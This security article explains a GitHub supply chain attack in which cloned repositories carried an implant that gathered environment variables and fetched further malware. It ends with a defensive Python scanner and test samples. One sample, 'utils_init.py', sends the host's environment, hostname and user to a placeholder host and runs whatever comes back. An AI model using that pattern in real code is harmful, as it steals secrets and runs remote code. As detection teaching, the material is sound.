GitHub Supply Chain Attack

A significant software supply chain attack has been discovered on GitHub. Although it was contained before it could spread further, it shows clearly how damaging “supply chain” attacks can be.

GitHub is the most popular code hosting service, used by over 83 million developers across the globe. It lets developers store their source code in repositories and track and control every change made to it. Its users form the largest coding community in the world.


What Is GitHub?

GitHub allows developers to collaborate on code repositories: other developers can contribute to code that is not their own, while the owner of the original code keeps full control over whether to accept or reject the changes proposed by other members of the community.

It is common for developers to download code repositories and use the code in their own applications.

When a developer wants to make significant changes to another developer’s code, they copy the repository into their own account. On GitHub this is the Fork function; a git “clone” is the corresponding local download, and the copies in this incident were clones re-uploaded as separate repositories rather than forks linked to the original. Either way the result is an exact copy of someone else’s code, while the original remains untouched under the management of its author. The original keeps its existing interaction stats, such as stars, contributors and watchers, whereas the copy is under new ownership and starts with no interaction stats at all, because it is essentially a new repository (albeit copied from an existing one).

What Happened?

According to research from Check Point, a malicious actor cloned upwards of 35,000 GitHub repositories and kept them identical to the original source code, apart from an added piece of malicious code. That implant fingerprinted the environment it was executed in: it collected details of the device, the identity of the user and the process environment, including environment variables, which often hold API keys, tokens and other sensitive data.

More significantly, the implant could also download additional malware from a third-party site. That second-stage payload could then further compromise any application or environment that was running code taken from the weaponized copies on GitHub.

Developers noticed the implant in code downloaded from GitHub, and the community initially feared that the source code of the original repositories had been infected. Further investigation showed that the infected code came from cloned copies, which developers had downloaded under the assumption that they were the original, non-malicious repositories.

The implications for the software supply chain are potentially catastrophic: an unsuspecting developer mistakenly downloads a cloned repository that carries malicious code, builds it into their own product, and then unknowingly ships malware to their own users.

How To Prevent Supply Chain Attacks

The practice of shifting security “left” and giving DevOps teams automated tools to embed security into their pipelines is not new, but adoption is slow. This attempt to compromise innumerable environments and applications in one go is a clear example of why supply chain security is critical.

Check Point recommends that developers use automated security tools to scan source code, third-party code included, so that threats are found and removed at the earliest phase. In practice that also means confirming that a repository really is the original before building on it: compare the owner and URL with the project’s official links, treat a copy with a familiar name but no stars, forks or contributor history with suspicion, and pin dependencies to a specific commit or signed release rather than to a branch name.
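The kind of source scan that advice points at, written out for the implant shape described above (fingerprint the host, send the result out, execute whatever comes back). This is an added example, not code from the article or from Check Point. The indicator lists are assumptions chosen for the example, the sample files are constructed, and the URL in them is a placeholder under the reserved .invalid domain, not a real indicator; it uses only Python’s standard library and resolves import aliases so that renaming a module does not hide a call.

```python
# Added example: static triage for files that show the implant shape described
# above (read host/user/environment details, send them out, execute the reply).
import ast
from dataclasses import dataclass, field
from typing import Optional

# Indicator lists are assumptions made for this example, not signatures from
# Check Point's report. Match is exact name or dotted prefix, so "os.environ"
# also covers "os.environ.get".
FINGERPRINT = ("os.environ", "os.getenv", "os.getlogin", "platform.node",
               "platform.uname", "socket.gethostname", "getpass.getuser")
NETWORK = ("requests.post", "requests.get", "urllib.request.urlopen",
           "http.client.HTTPSConnection", "socket.create_connection")
DYNAMIC_EXEC = ("exec", "eval", "subprocess.run", "subprocess.Popen",
                "os.system", "os.popen")


@dataclass
class Finding:
    filename: str
    fingerprint: set = field(default_factory=set)
    network: set = field(default_factory=set)
    dynamic_exec: set = field(default_factory=set)

    @property
    def verdict(self) -> str:
        # All three stages together is the implant; download-and-run without
        # fingerprinting still deserves a human look.
        if self.fingerprint and self.network and self.dynamic_exec:
            return "malicious-pattern"
        if self.network and self.dynamic_exec:
            return "suspicious"
        return "clean"


def _collect_aliases(tree: ast.AST) -> dict:
    """Map local names to qualified ones so 'import requests as r' and
    'from platform import node' cannot hide an indicator."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]
                aliases[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:
                if a.name != "*":
                    aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node: ast.AST, aliases: dict) -> Optional[str]:
    """Turn a Name/Attribute chain such as r.post into 'requests.post'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None  # e.g. call().attr; the call's own func node is walked separately
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage_source(src: str, filename: str = "<string>") -> Finding:
    """Parse one Python file and record which indicator families it touches."""
    tree = ast.parse(src, filename)
    aliases = _collect_aliases(tree)
    finding = Finding(filename)
    buckets = ((finding.fingerprint, FINGERPRINT), (finding.network, NETWORK),
               (finding.dynamic_exec, DYNAMIC_EXEC))
    for node in ast.walk(tree):
        if isinstance(node, (ast.Name, ast.Attribute)):
            name = _dotted_name(node, aliases)
            if name is None:
                continue
            for bucket, indicators in buckets:
                bucket.update(i for i in indicators
                              if name == i or name.startswith(i + "."))
    return finding


# Constructed samples standing in for files pulled from a repository; the URL
# is a placeholder (.invalid TLD), not a real indicator.
SAMPLES = {
    "settings.py": (  # reads the environment, no network, no exec
        'import os\n'
        'DB_URL = os.environ.get("DATABASE_URL", "sqlite:///dev.db")\n'),
    "plugin_loader.py": (  # download-and-run, but no fingerprinting
        'from urllib.request import urlopen as uo\n'
        'def load(url):\n'
        '    exec(uo(url).read())\n'),
    "utils_init.py": (  # fingerprint, exfiltrate, run whatever comes back
        'import os, socket, getpass\n'
        'import requests as r\n'
        'from platform import node\n'
        'def _c():\n'
        '    info = {"env": dict(os.environ), "host": socket.gethostname(),\n'
        '            "user": getpass.getuser(), "node": node()}\n'
        '    exec(r.post("http://example.invalid/c", json=info, timeout=5).text)\n'),
}


def scan_samples() -> dict:
    return {name: triage_source(src, name) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    print({n: f.verdict for n, f in scan_samples().items()})
```

To use it on a checkout, walk the tree, call triage_source on each .py file and review anything that is not “clean”. The three-stage rule is deliberately strict so that a configuration loader that reads the environment, or a downloader that writes to disk, is not flagged; the weak spot is obfuscation (strings assembled at runtime, getattr lookups), which a syntax-level scan like this cannot see and which is why the repository-provenance checks above still matter.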

Check Point
